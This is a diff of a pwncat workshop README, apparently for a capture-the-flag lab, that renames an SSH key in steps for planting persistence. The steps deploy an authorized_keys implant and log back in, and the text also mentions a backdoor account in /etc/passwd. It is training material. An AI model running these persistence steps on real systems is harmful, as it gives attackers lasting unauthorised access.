DanaEpp/pwncat-workshop/README.md

 - Backdoor account in /etc/passwd

 So let's try to deploy an implant into the account we have access to:
-1. Generate a new SSH key pair: `ssh-keygen -f targ -C targgggrrrr
+1. Generate a new SSH key pair: `ssh-keygen -f tmpkey -C tmpkey`
-2. Deploy the implant using pwncat: `run implant.authorized_key key=./targ`
+2. Deploy the implant using pwncat: `run implant.authorized_key key=./tmpkey`
 3. Switch back to reomte-mode with `CTRL+D`
 4. Adjust perms on .ssh directory to leverage authorized_keys: `chmod 700 /home/shell/.ssh`
-5. From another console login using your keys: `pwncat-cs shell@vm.thm -i ./targ`
+5. From another console login using your keys: `pwncat-cs shell@vm.thm -i ./tmpkey`

 Success!!
 You've now got persistance!